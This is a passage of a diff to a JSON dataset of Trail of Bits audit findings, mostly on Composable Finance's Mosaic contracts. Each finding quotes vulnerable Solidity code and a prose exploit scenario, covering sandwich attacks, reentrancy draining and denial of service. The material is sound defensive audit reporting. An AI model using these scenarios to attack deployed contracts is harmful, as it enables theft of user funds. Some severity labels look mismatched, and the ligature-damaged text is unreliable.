contracts/protocols/balancer/BalancerVaultV2Wrapper contracts/protocols/bancor/BancorWrapper contracts/protocols/compound/CompoundInvestmentStrategy contracts/protocols/curve/CurveWrapper contracts/protocols/gmx/GmxWrapper contracts/protocols/sushiswap/SushiswapLiquidityProvider contracts/protocols/synapse/ISynapseSwap contracts/protocols/synapse/SynapseWrapper contracts/protocols/uniswap/IUniswapV2Pair contracts/protocols/uniswap/UniswapV2Wrapper contracts/protocols/uniswap/UniswapWrapper Exploit Scenario Bob deploys the MsgSender contract. Eve front-runs the contracts initialization and sets her own address as the owner address. As a result, she can use the initialize function to update the contracts variables, modifying the system parameters. Recommendations Short term, to prevent front-running of the initializer functions, use hardhat-deploy to initialize the contracts or replace the functions with constructors. Alternatively, create a deployment script that will emit sucient errors when an initialize call fails. Long term, carefully review the Solidity documentation, especially the Warnings section, as well as the pitfalls of using the delegatecall proxy pattern.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Trades are vulnerable to sandwich attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The swapToNative function does not allow users to specify the minAmountOut parameter of swapExactTokensForETH , which indicates the minimum amount of ETH that a user will receive from a trade. Instead, the value is hard-coded to zero, meaning that there is no guarantee that users will receive any ETH in exchange for their tokens. By using a bot to sandwich a users trade, an attacker could increase the slippage incurred by the user and prot o of the spread at the users expense. The minAmountOut parameter is meant to prevent the execution of trades through illiquid pools and to provide protection against sandwich attacks. The current implementation lacks protections against high slippage and may cause users to lose funds. This applies to the AVAX version, too. Composable Finance indicated that only the relayer will call this function, but the function lacks access controls to prevent users from calling it directly. Importantly, it is highly likely that if a relayer does not implement proper protections, all of its trades will suer from high slippage, as they will represent pure-prot opportunities for sandwich bots. uint256 [] memory amounts = swapRouter.swapExactTokensForETH( _amount, 0 , path, _to, deadline ); Figure 2.1: Part of the SwapToNative function in MosaicNativeSwapperETH.sol: 4450 Exploit Scenario Bob, a relayer, makes a trade on behalf of a user. The minAmountOut value is set to zero, which means that the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Bob sells the tokens without purchasing any, eectively giving away tokens for free. Recommendations Short term, allow users (relayers) to input a slippage tolerance, and add access controls to the swapToNative function. Long term, consider the risks of integrating with other protocols such as Uniswap and implement mitigations for those risks.", + "labels": [ + "Trail of Bits", + "Severity: High", "Difficulty: Medium" ] }, { - "title": "4. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Primitive contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-js causes a security vulnerability in the Primitive contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "3. forwardCall creates a denial-of-service attack vector ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Low-level external calls can exhaust all available gas by returning an excessive amount of data, thereby causing the relayer to incur memory expansion costs. This can be used to cause an out-of-gas exception and is a denial-of-service (DoS) attack vector. Since arbitrary contracts can be called, Composable Finance should implement additional safeguards. If an out-of-gas exception occurs, the message will never be marked as forwarded ( forwarded[id] = true ). If the relayer repeatedly retries the transaction, assuming it will eventually be marked as forwarded, the queue of pending transactions will grow without bounds, with each unsuccessful message-forwarding attempt carrying a gas cost. The approveERC20TokenAndForwardCall function is also vulnerable to this DoS attack. (success, returnData) = _contract. call {value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require ( balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; Figure 3.1: Part of the forwardCall function in MsgReceiver:79-85 Exploit Scenario Eve deploys a contract that returns 10 million bytes of data. A call to that contract causes an out-of-gas exception. Since the transaction is not marked as forwarded, the relayer continues to propagate the transaction without success. This results in excessive resource consumption and a degraded quality of service. Recommendations Short term, require that the size of return data be xed to 32 bytes. Long term, review the documentation on low-level Solidity calls and EVM edge cases. References Excessively Safe Call", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: Medium" ] }, { - "title": "5. Lack of zero-value checks on functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. function deposit( address recipient, uint256 delRisky, uint256 delStable, bytes calldata data ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins[recipient].deposit(delRisky, delStable); // state update uint256 balRisky; uint256 balStable; if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); } Figure 5.1: rmm-core/contracts/PrimitiveEngine.sol#L201-L219 Among others, the following functions lack zero-value checks on their arguments: PrimitiveEngine.deposit PrimitiveEngine.withdraw PrimitiveEngine.allocate PrimitiveEngine.swap PositionDescriptor.constructor MarginManager.deposit MarginManager.withdraw SwapManager.swap CashManager.unwrap CashManager.sweepToken Exploit Scenario Alice, a user, mistakenly provides the zero address as an argument when depositing for a recipient. As a result, her funds are saved in the margins of the zero address instead of a dierent address. Recommendations Short term, add zero-value checks for all function arguments to ensure that users cannot mistakenly set incorrect values, misconguring the system. Long term, use Slither, which will catch functions that do not have zero-value checks.", + "title": "8. Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The owner of a contract in the Composable Finance ecosystem can be changed through a call to the transferOwnership function. This function internally calls the setOwner function, which immediately sets the contracts new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _setOwner( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _setOwner(newOwner); } function _setOwner ( address newOwner ) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 8.1: OpenZeppelins OwnableUpgradeable contract Exploit Scenario Bob, a Composable Finance developer, invokes transferOwnership() to change the address of an existing contracts owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, perform ownership transfers through a two-step process in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "9. sendFunds is vulnerable to reentrancy by owners ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The sendFunds function is vulnerable to reentrancy and can be used by the owner of a token contract to drain the contract of its funds. Specically, because fundsTransfered[user] is written to after a call to an external contract, the contracts owner could input his or her own address and reenter the sendFunds function to drain the contracts funds. An owner could send funds to him- or herself without using the reentrancy, but there is no reason to leave this vulnerability in the code. Additionally, the FundKeeper contract can send funds to any user by calling setAmountToSend and then sendFunds . It is unclear why amountToSend is not changed (set to zero) after a successful transfer. It would make more sense to call setAmountToSend after each transfer and to store users balances in a mapping. function setAmountToSend ( uint256 amount ) external onlyOwner { amountToSend = amount; emit NewAmountToSend(amount); } function sendFunds ( address user ) external onlyOwner { require (!fundsTransfered[user], \"reward already sent\" ); require ( address ( this ).balance >= amountToSend, \"Contract balance low\" ); // solhint-disable-next-line avoid-low-level-calls ( bool sent , ) = user.call{value: amountToSend}( \"\" ); require (sent, \"Failed to send Polygon\" ); fundsTransfered[user] = true ; emit FundSent(amountToSend, user); } Figure 9.1: Part of the sendFunds function in FundKeeper.sol:23-38 Exploit Scenario Eves smart contract is the owner of the FundKeeper contract. Eves contract executes a transfer for which Eve should receive only 1 ETH. Instead, because the user address is a contract with a fallback function, Eve can reenter the sendFunds function and drain all ETH from the contract. Recommendations Short term, set fundsTransfered[user] to true prior to making external calls. Long term, store each users balance in a mapping to ensure that users cannot make withdrawals that exceed their balances. Additionally, follow the checks-eects-interactions pattern.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "20. MosaicVault and MosaicHolding owner has excessive privileges ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The owner of the MosaicVault and MosaicHolding contracts has too many privileges across the system. Compromise of the owners private key would put the integrity of the underlying system at risk. The owner of the MosaicVault and MosaicHolding contracts can perform the following privileged operations in the context of the contracts: Rescuing funds if the system is compromised Managing withdrawals, transfers, and fee payments Pausing and unpausing the contracts Rebalancing liquidity across chains Investing in one or more investment strategies Claiming rewards from one or more investment strategies The ability to drain funds, manage liquidity, and claim rewards creates a single point of failure. It increases the likelihood that the contracts owner will be targeted by an attacker and increases the incentives for the owner to act maliciously. Exploit Scenario Alice, the owner of MosaicVault and MosaicHolding , deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alices machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, clearly document the functions and implementations that the owner of the MosaicVault and MosaicHolding contracts can change. Additionally, split the privileges provided to the owner across multiple roles (e.g., a fund manager, fund rescuer, owner, etc.) to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", + "labels": [ + "Trail of Bits", + "Severity: High", "Difficulty: High" ] }, { - "title": "6. uint256.percentage() and int256.percentage() are not inverses of each other ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Units library provides two percentage helper functions to convert unsigned integers to signed 64x64 xed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts denormalized percentage integer to a fixed point 64.64 number /// @dev Convert unsigned 256-bit integer number into signed 64.64 fixed point number /// @param denorm Unsigned percentage integer with precision of 1e4 /// @return Signed 64.64 fixed point percentage with precision of 1e4 function percentage( uint256 denorm) internal pure returns ( int128 ) { return denorm. divu (PERCENTAGE); } /// @notice Converts signed 64.64 fixed point percentage to a denormalized percetage integer /// @param denorm Signed 64.64 fixed point percentage /// @return Unsigned percentage denormalized with precision of 1e4 function percentage( int128 denorm) internal pure returns ( uint256 ) { return denorm. mulu (PERCENTAGE); } Figure 6.1: rmm-core/contracts/libraries/Units.sol#L53-L66 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu() , which both round downward toward zero. As a result, if a uint256 value is converted to a signed 64x64 xed point and then converted back to a uint256 value, the result will not equal the original uint256 value: function scalePercentages (uint256 value ) public { require(value > Units.PERCENTAGE); int128 signedPercentage = value.percentage(); uint256 unsignedPercentage = signedPercentage.percentage(); if(unsignedPercentage != value) { emit AssertionFailed( \"scalePercentages\" , signedPercentage, unsignedPercentage); assert(false); } Figure 6.2: rmm-core/contracts/LibraryMathEchidna.sol#L48-L57 used Echidna to determine this property violation: Analyzing contract: /rmm-core/contracts/LibraryMathEchidna.sol:LibraryMathEchidna scalePercentages(uint256): failed! Call sequence: scalePercentages(10006) Event sequence: Panic(1), AssertionFailed(\"scalePercentages\", 18457812120153777346, 10005) Figure 6.3: Echidna results Exploit Scenario 1. uint256.percentage() 10006.percentage() = 1.0006 , which truncates down to 1. 2. int128.percentage() 1.percentage() = 10000 . 3. The assertion fails because 10006 != 10000 . Recommendations Short term, either remove the int128.percentage() function if it is unused in the system or ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "title": "24. SushiswapLiquidityProvider deposits cannot be used to cover withdrawal requests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Withdrawal requests that require the removal of liquidity from a Sushiswap liquidity pool will revert and cause a system failure. When a user requests a withdrawal of liquidity from the Mosaic system, MosaicVault (via the coverWithdrawRequest() function) queries MosaicHolding to see whether liquidity must be removed from an investment strategy to cover the withdrawal amount (gure 24.1). function _withdraw ( address _accountTo , uint256 _amount , address _tokenIn , address _tokenOut , uint256 _amountOutMin , WithdrawData calldata _withdrawData, bytes calldata _data ) { internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount ) IMosaicHolding mosaicHolding = IMosaicHolding(vaultConfig.getMosaicHolding()); require (hasBeenWithdrawn[_withdrawData.id] == false , \"ERR: ALREADY WITHDRAWN\" ); if (_tokenOut == _tokenIn) { require ( mosaicHolding.getTokenLiquidity(_tokenIn, _withdrawData.investmentStrategies) >= _amount, \"ERR: VAULT BAL\" ); } [...] mosaicHolding.coverWithdrawRequest( _withdrawData.investmentStrategies, _tokenIn, withdrawAmount ); [...] } Figure 24.1: The _ withdraw function in MosaicVault :40 4-474 If MosaicHolding s balance of the token being withdrawn ( _tokenIn ) is not sucient to cover the withdrawal, MosaicHolding will iterate through each investment strategy in the _investmentStrategy array and remove enough _tokenIn to cover it. To remove liquidity from an investment strategy, it calls withdrawInvestment() on that strategy (gure 24.2). function coverWithdrawRequest ( address [] calldata _investmentStrategies, address _token , uint256 _amount ) external override { require (hasRole(MOSAIC_VAULT, msg.sender ), \"ERR: PERMISSIONS A-V\" ); uint256 balance = IERC20(_token).balanceOf( address ( this )); if (balance >= _amount) return ; uint256 requiredAmount = _amount - balance; uint8 index ; while (requiredAmount > 0 ) { address strategy = _investmentStrategies[index]; IInvestmentStrategy investment = IInvestmentStrategy(strategy); uint256 investmentAmount = investment.investmentAmount(_token); uint256 amountToWithdraw = 0 ; if (investmentAmount >= requiredAmount) { amountToWithdraw = requiredAmount; requiredAmount = 0 ; } else { amountToWithdraw = investmentAmount; requiredAmount = requiredAmount - investmentAmount; } IInvestmentStrategy.Investment[] memory investments = new IInvestmentStrategy.Investment[]( 1 ); investments[ 0 ] = IInvestmentStrategy.Investment(_token, amountToWithdraw); IInvestmentStrategy(investment).withdrawInvestment(investments, \"\" ); emit InvestmentWithdrawn(strategy, msg.sender ); index++; } require (IERC20(_token).balanceOf( address ( this )) >= _amount, \"ERR: VAULT BAL\" ); } Figure 24.2: The coverWithdrawRequest function in MosaicHolding:217-251 This process works for an investment strategy in which the investments array function argument has a length of 1. However, in the case of SushiswapLiquidityProvider , the withdrawInvestment() function expects the investments array to have a length of 2 (gure 24.3). function withdrawInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant { Investment memory investmentA = _investments[ 0 ]; Investment memory investmentB = _investments[ 1 ]; ( uint256 deadline , uint256 liquidity ) = abi.decode(_data, ( uint256 , uint256 )); IERC20Upgradeable pair = IERC20Upgradeable(getPair(investmentA.token, investmentB.token)); pair.safeIncreaseAllowance( address (sushiSwapRouter), liquidity); ( uint256 amountA , uint256 amountB ) = sushiSwapRouter.removeLiquidity( investmentA.token, investmentB.token, liquidity, investmentA.amount, investmentB.amount, address ( this ), deadline ); IERC20Upgradeable(investmentA.token).safeTransfer(mosaicHolding, amountA); IERC20Upgradeable(investmentB.token).safeTransfer(mosaicHolding, amountB); } Figure 24.3: The withdrawInvestment function in SushiswapLiquidityProvider :90-113 Thus, any withdrawal request that requires the removal of liquidity from SushiswapLiquidityProvider will revert. Exploit Scenario Alice wishes to withdraw liquidity ( tokenA ) that she deposited into the Mosaic system. The MosaicHolding contract does not hold enough tokenA to cover the withdrawal and thus tries to withdraw tokenA from the SushiswapLiquidityProvider investment strategy. The request reverts, and Alices withdrawal request fails, leaving her unable to access her funds. Recommendations Short term, avoid depositing user liquidity into the SushiswapLiquidityProvider investment strategy. Long term, take the following steps: Identify and implement one or more data structures that will reduce the technical debt resulting from the use of the InvestmentStrategy interface. Develop a more eective solution for covering withdrawals that does not consistently require withdrawing funds from other investment strategies.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "26. MosaicVault and MosaicHolding owner is controlled by a single private key ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The MosaicVault and MosaicHolding contracts manage many critical functionalities, such as those for rescuing funds, managing liquidity, and claiming rewards. The owner of these contracts is a single externally owned account (EOA). As mentioned in TOB-CMP-20 , this creates a single point of failure. Moreover, it makes the owner a high-value target for attackers and increases the incentives for the owner to act maliciously. If the private key is compromised, the system will be compromised too. Exploit Scenario Alice, the owner of the MosaicVault and MosaicHolding contracts, deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alices machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, change the owner of the contracts from a single EOA to a multi-signature account. Long term, take the following steps: Develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure. Assess the systems key management infrastructure and document the associated risks as well as an incident response plan.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "27. The relayer is a single point of failure ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Because the relayer is a centralized service that is responsible for critical functionalities, it constitutes a single point of failure within the Mosaic ecosystem. The relayer is responsible for the following tasks: Managing withdrawals across chains Managing transfers across chains Managing the accrued interest on all users investments Executing cross-chain message call requests Collecting fees for all withdrawals, transfers, and cross-chain message calls Refunding fees in case of failed transfers or withdrawals The centralized design and importance of the relayer increase the likelihood that the relayer will be targeted by an attacker. Exploit Scenario Eve, an attacker, is able to gain root access on the server that runs the relayer. Eve can then shut down the Mosaic system by stopping the relayer service. Eve can also change the source code to trigger behavior that can lead to the drainage of funds. Recommendations Short term, document an incident response plan and monitor exposed ports and services that may be vulnerable to exploitation. Long term, arrange an external security audit of the core and peripheral relayer source code. Additionally, consider implementing a decentralized relayer architecture more resistant to system takeovers.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "4. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Although dependency scans did not yield a direct threat to the project under review, npm and yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repositories under review. The output below details these issues. CVE ID", + "labels": [ + "Trail of Bits", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "7. Users can allocate tokens to a pool at the moment the pool reaches maturity ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Users can allocate tokens to a pool at the moment the pool reaches maturity, which creates an opportunity for attackers to front-run or update the curve right before the maturity period ends. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 7.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, document the expected behavior of transactions to allocate funds into a pool that has just reached maturity and analyze the front-running risk. Long term, analyze all front-running risks on all transactions in the system.", + "title": "10. DoS risk created by cross-chain message call requests on certain networks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Cross-chain message calls that are requested on a low-fee, low-latency network could facilitate a DoS, preventing other users from interacting with the system. If a user, through the MsgSender contract, sent numerous cross-chain message call requests, the relayer would have to act upon the emitted events regardless of whether they were legitimate or part of a DoS attack. Exploit Scenario Eve creates a theoretically innite series of transactions on Arbitrum, a low-fee, low-latency network. The internal queue of the relayer is then lled with numerous malicious transactions. Alice requests a cross-chain message call; however, because the relayer must handle many of Eves transactions rst, Alice has to wait an undened amount of time for her transaction to be executed. Recommendations Short term, create multiple queues that work across the various chains to mitigate this DoS risk. Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "8. Possible front-running vulnerability during BUFFER time ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The PrimitiveEngine.swap function permits swap transactions until 120 seconds after maturity, which could enable miners to front-run swap transactions and engage in malicious behavior. The constant tau value may allow miners to prot from front-running transactions when the swap curve is locked after maturity. SwapDetails memory details = SwapDetails({ recipient: recipient, poolId: poolId, deltaIn: deltaIn, deltaOut: deltaOut, riskyForStable: riskyForStable, fromMargin: fromMargin, toMargin: toMargin, timestamp: _blockTimestamp() }); uint32 lastTimestamp = _updateLastTimestamp(details.poolId); // updates lastTimestamp of `poolId` if (details.timestamp > lastTimestamp + BUFFER) revert PoolExpiredError(); // 120s buffer to allow final swaps Figure 8.1: rmm-core/contracts/PrimitiveEngine.sol#L314-L326 Recommendations Short term, perform an o-chain analysis on the curve and the swaps to determine the impact of a front-running attack on these transactions. Long term, perform an additional economic analysis with historical data on pools to determine the impact of front-running attacks on all functionality in the system.", + "title": "12. Unimplemented getAmountsOut function in Balancer V2 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The getAmountsOut function in the BalancerV2Wrapper contract is unimplemented. The purpose of the getAmountsOut() function, shown in gure 12.1, is to allow users to know the amount of funds they will receive when executing a swap. Because the function does not invoke any functions on the Balancer Vault, a user must actually perform a swap to determine the amount of funds he or she will receive: function getAmountsOut ( address , address , uint256 , bytes calldata ) external pure override returns ( uint256 ) { return 0 ; } Figure 12.1: The getAmountsOut function in BalancerVaultV2Wrapper:43-50 Exploit Scenario Alice, a user of the Composable Finance vaults, wants to swap 100 USDC for DAI on Balancer. Because the getAmountsOut function is not implemented, she is unable to determine how much DAI she will receive before executing the swap. Recommendations Short term, implement the getAmountsOut function and have it call the queryBatchSwap function on the Balancer Vault. Long term, add unit tests for all functions to test all ows. Unit tests will detect incorrect function behavior.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "9. Inconsistency in allocate and remove functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The allocate and remove functions do not have the same interface, as one would expect. The allocate function allows users to set the recipient of the allocated liquidity and choose whether the funds will be taken from the margins or sent directly. The remove function unallocates the liquidity from the pool and sends the tokens to the msg.sender ; with this function, users cannot set the recipient of the tokens or choose whether the tokens will be credited to their margins for future use or directly sent back to them. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 9.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, either document the design decision or add the logic to the remove function allowing users to set the recipient and to choose whether the tokens should be credited to their margins . Long term, make sure to document design decisions and the rationale behind them, especially for behavior that may not be obvious.", + "title": "28. Lack of events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Several critical operations do not trigger events. As a result, it will be dicult to review the correct behavior of the contracts once they have been deployed. For example, the setRelayer function, which is called in the MosaicVault contract to set the relayer address, does not emit an event providing conrmation of that operation to the contracts caller (gure 28.1). function setRelayer ( address _relayer ) external override onlyOwner { relayer = _relayer; } Figure 28.1: The setRelayer() function in MosaicVault:80-82 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the MosaicVault contract. She then sets a new relayer address. Alice, a Composable Finance team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components. 30. Insu\u0000cient protection of sensitive information Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-CMP-30 Target: CrosslayerPortal/env , bribe-protocol/hardhat.config.ts", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "10. Areas of the codebase that are inconsistent with the documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Primitive codebase contains clear documentation and mathematical analysis denoting the intended behavior of the system. However, we identied certain areas in which the implementation does not match the white paper, including the following: Expected range for the gamma value of a pool. The white paper denes 10,000 as 100% in the smart contract; however, the contract checks that the provided gamma is between 9,000 (inclusive) and 10,000 (exclusive); if it is not within this range, the pool reverts with a GammaError . The white paper should be updated to reect the behavior of the code in these areas. Recommendations Short term, review and properly document all areas of the codebase with this gamma range check. Long term, ensure that the formal specication matches the expected behavior of the protocol.", + "title": "5. Accrued interest is not attributable to the underlying investor on-chain ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "When an investor earns interest-bearing tokens by lending funds through Mosaics investment strategies, the tokens are not directly attributed to the investor by on-chain data. The claim() function, which can be called only by the owner of the MosaicHolding contract, is dened in the contract and used to redeem interest-bearing tokens from protocols such as Aave and Compound (gure 5.1). The underlying tokens of these protocols lending pools are provided by users who are interacting with the Mosaic system and wish to earn rewards on their idle funds. function claim ( address _investmentStrategy , bytes calldata _data) external override onlyAdmin validAddress(_investmentStrategy) { require (investmentStrategies[_investmentStrategy], \"ERR: STRATEGY NOT SET\" ); address rewardTokenAddress = IInvestmentStrategy(_investmentStrategy).claimTokens(_data); emit TokenClaimed(_investmentStrategy, rewardTokenAddress); } Figure 5.1: The claim function in MosaicHolding:270-279 During the execution of claim() , the internal claimTokens() function calls into the AaveInvestmentStrategy , CompoundInvestmentStrategy , or SushiswapLiquidityProvider contract, which eectively transfers its balance of the interest-bearing token directly to the MosaicHolding contract. Figure 5.2 shows the claimTokens() function call in AaveInvestmentStrategy . function claimTokens ( bytes calldata data) external override onlyInvestor returns ( address ) { address token = abi.decode(data, ( address )); ILendingPool lendingPool = ILendingPool(lendingPoolAddressesProvider.getLendingPool()); DataTypes.ReserveData memory reserve = lendingPool.getReserveData(token); IERC20Upgradeable(reserve.aTokenAddress).safeTransfer( mosaicHolding, IERC20Upgradeable(reserve.aTokenAddress).balanceOf( address ( this )) ); return reserve.aTokenAddress; } Figure 5.2: The c laimTokens function in AaveInvestmentStrategy:58-68 However, there is no identiable 